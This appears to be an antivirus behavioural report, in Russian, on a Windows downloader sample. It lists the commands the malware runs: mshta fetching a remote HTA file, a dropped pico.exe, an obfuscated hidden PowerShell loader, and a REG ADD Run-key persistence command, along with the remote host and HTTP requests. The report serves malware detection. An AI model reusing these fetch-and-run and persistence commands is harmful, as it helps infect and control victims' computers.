Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://17#.#3.175.187/swih/blow.hta
- '%APPDATA%\pico.exe'
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 53
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\pico.exe
Сетевая активность
Подключается к
- '17#.#3.175.187':80
TCP
Запросы HTTP GET
- http://17#.#3.175.187/swih/blow.hta
- http://17#.#3.175.187/swih/pico.exe
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function O($IA, $nB){[IO.File]::WriteAllBytes($IA, $nB)};function k($IA){if($IA.EndsWith((IS @(14374,14428,14436,14436))) -eq $True){Start-Process (IS @(14442,1444...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 53 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "dynu" /t REG_SZ /d "%LOCALAPPDATA%\drv\thar.exe"
